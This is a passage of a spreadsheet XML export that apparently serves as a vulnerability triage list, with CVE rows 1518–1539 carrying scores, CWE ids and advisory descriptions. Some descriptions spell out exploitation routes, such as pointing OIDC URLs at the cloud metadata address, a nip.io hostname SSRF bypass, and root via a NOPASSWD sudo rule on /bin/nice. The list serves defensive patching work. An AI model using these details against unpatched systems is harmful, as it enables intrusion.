          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, Admin-configured OIDC token_url and user_info_url in includes/oidc/handle_oidc_callback.php:18-49 are used directly in curl_init() with zero SSRF filtering. Unlike logo/webhook URLs which have validate_webhook_url_for_ssrf(), OIDC URLs bypass all protections. Admin sets URL to http://169.254.169.254/latest/meta-data/ for cloud metadata access or internal network pivoting. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61640</t>
        </is>
      </c>
    </row>
    <row r="1519">
      <c r="A1519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62246</t>
        </is>
      </c>
      <c r="C1519" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1519" s="5" t="inlineStr"/>
      <c r="F1519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1519" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1519" s="5" t="inlineStr"/>
      <c r="I1519" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1519" s="5" t="inlineStr"/>
      <c r="K1519" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-653</t>
        </is>
      </c>
      <c r="L1519" s="5" t="inlineStr">
        <is>
          <t>Kamaji is the Hosted Control Plane Manager for Kubernetes. Prior to 26.7.4-edge, Kamaji derives a TenantControlPlane datastore schema, database user, and etcd key prefix from a lossy namespace-and-name normalization in GetDefaultDatastoreSchema() and GetDefaultDatastoreUsername(), allowing distinct tenants with colliding normalized identifiers to share control-plane state and read, modify, or destroy another tenant's Kubernetes data. This issue is fixed in version 26.7.4-edge.</t>
        </is>
      </c>
      <c r="M1519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62246</t>
        </is>
      </c>
    </row>
    <row r="1520">
      <c r="A1520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63425</t>
        </is>
      </c>
      <c r="C1520" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1520" s="5" t="inlineStr"/>
      <c r="F1520" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1520" s="5" t="inlineStr"/>
      <c r="H1520" s="5" t="inlineStr">
        <is>
          <t>lenovo:dock_manager</t>
        </is>
      </c>
      <c r="I1520" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1520" s="5" t="inlineStr"/>
      <c r="K1520" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1520" s="5" t="inlineStr">
        <is>
          <t>During an internal security assessment, a potential improper permissions vulnerability was discovered in Lenovo Dock Manager that could allow a local authenticated user to execute arbitrary code with elevated privileges.</t>
        </is>
      </c>
      <c r="M1520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63425</t>
        </is>
      </c>
    </row>
    <row r="1521">
      <c r="A1521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63427</t>
        </is>
      </c>
      <c r="C1521" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1521" s="5" t="inlineStr"/>
      <c r="F1521" s="5" t="inlineStr"/>
      <c r="G1521" s="5" t="inlineStr"/>
      <c r="H1521" s="5" t="inlineStr"/>
      <c r="I1521" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1521" s="5" t="inlineStr"/>
      <c r="K1521" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1521" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability was discovered in Lenovo Software Fix that could allow a local authenticated user to perform arbitrary code execution with elevated privileges.</t>
        </is>
      </c>
      <c r="M1521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63427</t>
        </is>
      </c>
    </row>
    <row r="1522">
      <c r="A1522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64195</t>
        </is>
      </c>
      <c r="C1522" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1522" s="5" t="inlineStr"/>
      <c r="F1522" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1522" s="5" t="inlineStr"/>
      <c r="H1522" s="5" t="inlineStr"/>
      <c r="I1522" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1522" s="5" t="inlineStr"/>
      <c r="K1522" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1522" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to lack of proper validation of user-supplied data. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64195</t>
        </is>
      </c>
    </row>
    <row r="1523">
      <c r="A1523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64196</t>
        </is>
      </c>
      <c r="C1523" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1523" s="5" t="inlineStr"/>
      <c r="F1523" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1523" s="5" t="inlineStr"/>
      <c r="H1523" s="5" t="inlineStr"/>
      <c r="I1523" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1523" s="5" t="inlineStr"/>
      <c r="K1523" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1523" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to improper validation of user-supplied data, resulting in a write past the end of an allocated heap. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64196</t>
        </is>
      </c>
    </row>
    <row r="1524">
      <c r="A1524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64197</t>
        </is>
      </c>
      <c r="C1524" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1524" s="5" t="inlineStr"/>
      <c r="F1524" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1524" s="5" t="inlineStr"/>
      <c r="H1524" s="5" t="inlineStr"/>
      <c r="I1524" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1524" s="5" t="inlineStr"/>
      <c r="K1524" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1524" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to improper validation of user-supplied data, resulting in a write past the end of an allocated data structure. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64197</t>
        </is>
      </c>
    </row>
    <row r="1525">
      <c r="A1525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64198</t>
        </is>
      </c>
      <c r="C1525" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1525" s="5" t="inlineStr"/>
      <c r="F1525" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1525" s="5" t="inlineStr"/>
      <c r="H1525" s="5" t="inlineStr"/>
      <c r="I1525" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1525" s="5" t="inlineStr"/>
      <c r="K1525" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1525" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read a few bytes past the end of an allocated heap buffer during file handling.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64198</t>
        </is>
      </c>
    </row>
    <row r="1526">
      <c r="A1526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64200</t>
        </is>
      </c>
      <c r="C1526" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1526" s="5" t="inlineStr"/>
      <c r="F1526" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1526" s="5" t="inlineStr"/>
      <c r="H1526" s="5" t="inlineStr"/>
      <c r="I1526" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1526" s="5" t="inlineStr"/>
      <c r="K1526" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1526" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read a past the end of an allocated heap buffer during string conversion.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64200</t>
        </is>
      </c>
    </row>
    <row r="1527">
      <c r="A1527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64851</t>
        </is>
      </c>
      <c r="C1527" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1527" s="5" t="inlineStr"/>
      <c r="F1527" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1527" s="5" t="inlineStr"/>
      <c r="H1527" s="5" t="inlineStr"/>
      <c r="I1527" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1527" s="5" t="inlineStr"/>
      <c r="K1527" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1527" s="5" t="inlineStr">
        <is>
          <t>Grav Shortcode Core Plugin allows for the development shortcode plugins that utilize the common format utilized by WordPress and BBCode. Prior to 6.2.2, Grav Shortcode Core passes shortcode syntax through Security::detectXss() because it contains no literal less-than character, then ColorShortcode.php and related attribute handlers concatenate an attacker-controlled parameter into HTML without encoding. An account with admin.pages permission can close the generated attribute and add an event handler, creating stored cross-site scripting that executes for visitors or administrators who view the page. This issue is fixed in version 6.2.2.</t>
        </is>
      </c>
      <c r="M1527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64851</t>
        </is>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65986</t>
        </is>
      </c>
      <c r="C1528" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1528" s="5" t="inlineStr"/>
      <c r="F1528" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1528" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1528" s="5" t="inlineStr"/>
      <c r="I1528" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1528" s="5" t="inlineStr"/>
      <c r="K1528" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-79</t>
        </is>
      </c>
      <c r="L1528" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. Versions 2.5.0 through 2.66.0 contain a XSS vulnerability that can be accessed through annotation guide assets. When CVAT serves the files attached to an annotation guide, it labels them with a media type ( Content-Type ) that the attacker can influence, so instead of treating an uploaded file as plain data, the victim's browser can be told to treat it as an HTML page and run any JavaScript inside it. This issue has been fixed in version 2.67.0.</t>
        </is>
      </c>
      <c r="M1528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65986</t>
        </is>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="C1529" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1529" s="5" t="inlineStr"/>
      <c r="F1529" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1529" s="5" t="inlineStr"/>
      <c r="H1529" s="5" t="inlineStr"/>
      <c r="I1529" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1529" s="5" t="inlineStr"/>
      <c r="K1529" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1529" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="1530">
      <c r="A1530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="C1530" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1530" s="5" t="inlineStr"/>
      <c r="F1530" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1530" s="5" t="inlineStr"/>
      <c r="H1530" s="5" t="inlineStr"/>
      <c r="I1530" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1530" s="5" t="inlineStr"/>
      <c r="K1530" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1530" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="1531">
      <c r="A1531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67397</t>
        </is>
      </c>
      <c r="C1531" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1531" s="5" t="inlineStr"/>
      <c r="F1531" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1531" s="5" t="inlineStr"/>
      <c r="H1531" s="5" t="inlineStr"/>
      <c r="I1531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1531" s="5" t="inlineStr"/>
      <c r="K1531" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1531" s="5" t="inlineStr">
        <is>
          <t>Path traversal in Plesk 18.0.79.9 and earlier and 18.0.80 through 18.0.80.5 allows local users to execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M1531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67397</t>
        </is>
      </c>
    </row>
    <row r="1532">
      <c r="A1532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67609</t>
        </is>
      </c>
      <c r="C1532" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1532" s="5" t="inlineStr"/>
      <c r="F1532" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1532" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1532" s="5" t="inlineStr"/>
      <c r="I1532" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1532" s="5" t="inlineStr"/>
      <c r="K1532" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1532" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain a privilege escalation vulnerability that allows attackers with access to the apache account to execute arbitrary commands as root by exploiting an insecure sudoers configuration in /etc/sudoers.d/telenia. The configuration grants the apache user NOPASSWD execution of /bin/nice, which can be leveraged to invoke arbitrary commands, enabling full root-level command execution without supplying a password.</t>
        </is>
      </c>
      <c r="M1532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67609</t>
        </is>
      </c>
    </row>
    <row r="1533">
      <c r="A1533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="C1533" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1533" s="5" t="inlineStr"/>
      <c r="F1533" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1533" s="5" t="inlineStr"/>
      <c r="H1533" s="5" t="inlineStr"/>
      <c r="I1533" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1533" s="5" t="inlineStr"/>
      <c r="K1533" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1533" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="1534">
      <c r="A1534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68558</t>
        </is>
      </c>
      <c r="C1534" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1534" s="5" t="inlineStr"/>
      <c r="F1534" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1534" s="5" t="inlineStr"/>
      <c r="H1534" s="5" t="inlineStr"/>
      <c r="I1534" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1534" s="5" t="inlineStr"/>
      <c r="K1534" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1534" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. From 8.36 until 9.74, the outgoing webhook Integration URL validator in models/integrations.js checked only the literal URL.hostname against regular expressions, so DNS names such as 169-254-169-254.nip.io passed that first-line check. The delivery path's fetchSafe guard already blocked the reported IPv4 destination, but its separate IPv4-only resolver and duplicated blocklist created inconsistent all-address-family enforcement and drift risk between input-time and connection-time validation. Version 9.74 makes server/lib/ssrfGuard.js resolve all addresses with `dns.lookup({ all: true })`, validate every result through the shared isIpBlocked logic, pin the connection, and block redirects. This issue is fixed in version 9.74.</t>
        </is>
      </c>
      <c r="M1534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68558</t>
        </is>
      </c>
    </row>
    <row r="1535">
      <c r="A1535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69250</t>
        </is>
      </c>
      <c r="C1535" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1535" s="5" t="inlineStr"/>
      <c r="F1535" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1535" s="5" t="inlineStr"/>
      <c r="H1535" s="5" t="inlineStr"/>
      <c r="I1535" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1535" s="5" t="inlineStr"/>
      <c r="K1535" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1535" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the OAuth2 token refresh endpoint POST /api/v1/oauth2-credential/refresh/:credentialId is unauthenticated by design and performs a server-side HTTP request to the credential-controlled accessTokenUrl without SSRF protections. Runtime validation confirmed that the endpoint was reachable without authentication, triggered outbound POST requests to an attacker-controlled server, reflected the full remote response body to the caller through tokenInfo, and sent client_id, client_secret, grant_type=refresh_token, and refresh_token in the request body. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M1535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69250</t>
        </is>
      </c>
    </row>
    <row r="1536">
      <c r="A1536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6958</t>
        </is>
      </c>
      <c r="C1536" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1536" s="5" t="inlineStr"/>
      <c r="F1536" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1536" s="5" t="inlineStr">
        <is>
          <t>windows, openssl</t>
        </is>
      </c>
      <c r="H1536" s="5" t="inlineStr"/>
      <c r="I1536" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1536" s="5" t="inlineStr"/>
      <c r="K1536" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1536" s="5" t="inlineStr">
        <is>
          <t>Acunetix 25.11.251107123 for Windows contains a local privilege escalation vulnerability in the Web Vulnerability Scanning Engine (wvsc.exe) that allows low-privileged local attackers to execute arbitrary code as SYSTEM by exploiting a missing hardcoded directory path for OpenSSL-related files. Attackers can create the missing directory, place a malicious file at the expected path, and cause the SYSTEM-level wvsc.exe process to load and execute it, resulting in full privilege escalation.</t>
        </is>
      </c>
      <c r="M1536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6958</t>
        </is>
      </c>
    </row>
    <row r="1537">
      <c r="A1537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73072</t>
        </is>
      </c>
      <c r="C1537" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1537" s="5" t="inlineStr"/>
      <c r="F1537" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1537" s="5" t="inlineStr"/>
      <c r="H1537" s="5" t="inlineStr"/>
      <c r="I1537" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1537" s="5" t="inlineStr"/>
      <c r="K1537" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1537" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0846, set_sofo() in src/spellfile.c reuses sl_sal_first[] without resetting values left by set_sal_first(), so a crafted spell file containing an SN_SAL section before an SN_SOFO section causes under-counted mapping lists and attacker-influenced writes beyond a heap allocation. This issue is fixed in version 9.2.0846.</t>
        </is>
      </c>
      <c r="M1537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73072</t>
        </is>
      </c>
    </row>
    <row r="1538">
      <c r="A1538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73079</t>
        </is>
      </c>
      <c r="C1538" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1538" s="5" t="inlineStr"/>
      <c r="F1538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1538" s="5" t="inlineStr"/>
      <c r="H1538" s="5" t="inlineStr"/>
      <c r="I1538" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1538" s="5" t="inlineStr"/>
      <c r="K1538" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-441</t>
        </is>
      </c>
      <c r="L1538" s="5" t="inlineStr">
        <is>
          <t>Sub2API is an AI API gateway platform designed to distribute and manage API quotas from AI product subscriptions. From 0.1.135, to 0.1.168, platform API keys issued to tenants are exchanged for upstream requests made with shared provider accounts (ChatGPT/Codex OAuth, OpenAI platform keys, or an operator-configured base URL) that belong to the operator, not to the caller. The `POST /responses/*subpath` wildcard routes spliced the client-supplied subpath into the upstream URL with no validation. This lets an authenticated tenant relay requests to arbitrary upstream endpoints using pooled account credentials via a path traversal. This vulnerability is fixed in 0.1.169.</t>
        </is>
      </c>
      <c r="M1538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73079</t>
        </is>
      </c>
    </row>
    <row r="1539">
      <c r="A1539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73233</t>
        </is>
      </c>
      <c r="C1539" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1539" s="5" t="inlineStr"/>
      <c r="F1539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1539" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1539" s="5" t="inlineStr"/>
      <c r="I1539" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1539" s="5" t="inlineStr"/>
      <c r="K1539" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1539" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, the FEM Displacement Constraint task dialog in src/Mod/Fem/Gui/TaskFemConstraintDisplacement.cpp passes the xDisplacementFormula, yDisplacementFormula, and zDisplacementFormula fields of a Fem::ConstraintDisplacement object through TaskDlgFemConstraintDisplacement::accept() into Gui::Command::doCommand. The escaping helper neutralizes quotation marks but not backslashes, allowing crafted formula text to terminate the generated Python string and execute arbitrary Python code with the FreeCAD process's privileges when a victim accepts the dialog. This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M1539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73233</t>
        </is>
      </c>
    </row>
    <row r="1540">
      <c r="A1540" s="5" t="inlineStr">
        <is>
